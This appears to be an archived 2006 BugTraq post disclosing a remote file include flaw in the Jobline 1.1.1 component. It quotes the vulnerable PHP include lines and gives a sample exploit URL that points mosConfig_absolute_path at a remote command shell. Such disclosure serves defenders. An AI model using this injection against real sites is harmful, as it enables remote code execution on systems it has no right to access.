BugTraq
Jobline 1 1 1 Version - Remote File Include Vulnerability Jun 13 2006 06:41PM
SpC-x Bsdmail Org
# SaVSaK.CoM | SpC-x - The_BeKiR |

# Jobline 1 1 1 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Jobline

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.ph
p" ) ) {

# include_once("$mosConfig_absolute_path/components/$option/language/$mosC
onfig_lang.php");

# } else {

# include_once("$mosConfig_absolute_path/components/$option/language/engli
sh.php");

# }

# Vulnerable :

# http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=
Command-Shell

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus